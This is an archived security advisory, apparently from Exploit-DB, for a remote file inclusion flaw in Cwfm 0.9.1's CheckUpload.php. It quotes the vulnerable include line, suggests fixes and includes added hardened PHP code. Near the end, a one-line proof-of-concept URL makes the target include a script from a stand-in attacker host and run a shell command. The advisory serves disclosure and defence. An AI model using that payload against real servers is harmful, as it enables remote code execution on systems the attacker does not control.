Cwfm 0.9.1 - 'Language' Remote File Inclusion

Author: Philipp Niedziela
type: webapps
platform: php
port: 80
date_added: 2006-08-07  
date_updated: 2016-09-01  
verified: 1  
codes: OSVDB-27857;CVE-2006-4077  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comCwfm-0.9.1.tar.gz  

raw file: 2151.txt  
+--------------------------------------------------------------------
+
+ Cwfm-0.9.1 (Language) Remote File Inclusion
+
+ Original advisory:
+
+ http://www.bb-pcsecurity.de/Websecurity/301/org/Cwfm-0.9.1_(Language)_Remote_File_Inclusion.htm
+
+--------------------------------------------------------------------
+
+ Affected Software .: Cwfm 0.9.1
+ Vendor ............: http://cwfm.sourceforge.net/
+ Class .............: Remote File Inclusion in /CheckUpload.php
+ Risk ..............: high (Remote File Execution)
+ Found by ..........: Philipp Niedziela
+ Contact ...........: webmaster[at]bb-pcsecurity[.]de
+                      http://www.bb-pcsecurity.de
+
+--------------------------------------------------------------------
+
+ Code /CheckUpload.php
+
+ .....
+ session_start();
+ include_once("Global.php");
+ //include_once("lang/$Language.php");
+ include_once("$Language.php");
+ .....
+
+--------------------------------------------------------------------
+
+ $Language is neither declared nor sanitized before it is passed to include_once().
+
+--------------------------------------------------------------------
+
+ Solution:
+ Declare $Language before using it, include the config file, or
+ deny direct access to the vulnerable file.
+
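+ A hardened form of the include shown above, written here as an added example that is not part of the original advisory or of the Cwfm code base. It assumes the language files live in lang/ and that "en", "de" and "fr" are the shipped language names; adjust the allowlist to the real files.
+
```php
<?php
// Added example, not Cwfm's own code: replaces include_once("$Language.php")
// in CheckUpload.php with an allowlisted, locally resolved include.
session_start();
include_once("Global.php");

// Only language files that actually ship are acceptable. Names are assumed.
const ALLOWED_LANGUAGES = ['en', 'de', 'fr'];

/**
 * Map a requested language name to a local file path, or null when the
 * name is not on the allowlist. Because the name is matched exactly and
 * then joined onto a fixed directory, a URL ("http://...") or a traversal
 * sequence ("../") can never reach include_once().
 */
function resolveLanguageFile(string $requested): ?string
{
    if (!in_array($requested, ALLOWED_LANGUAGES, true)) {
        return null;
    }
    $path = __DIR__ . '/lang/' . $requested . '.php';
    return is_file($path) ? $path : null;
}

// Declare $Language explicitly instead of relying on register_globals
// to populate it from the query string.
$Language = isset($_SESSION['Language']) ? (string) $_SESSION['Language'] : 'en';

$file = resolveLanguageFile($Language);
if ($file === null) {
    $file = resolveLanguageFile('en');   // fall back to the default language
}
if ($file === null) {
    http_response_code(500);
    exit('Language file missing');
}
include_once($file);
```
+
+ Independently of this change, running with register_globals=Off and allow_url_include=Off in php.ini removes the two preconditions the PoC relies on.
+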
+--------------------------------------------------------------------
+
+ PoC:
+
+ http://[target]/CheckUpload.php?Language=http://evilsite.com/dblib.php/&cmd=ls
+
+--------------------------------------------------------------------
+
+ Note:
+ Vendor contacted, but no response. So apply a dirty patch yourself.
+
+-------------------------[ E O F ]----------------------------------

# milw0rm.com [2006-08-08]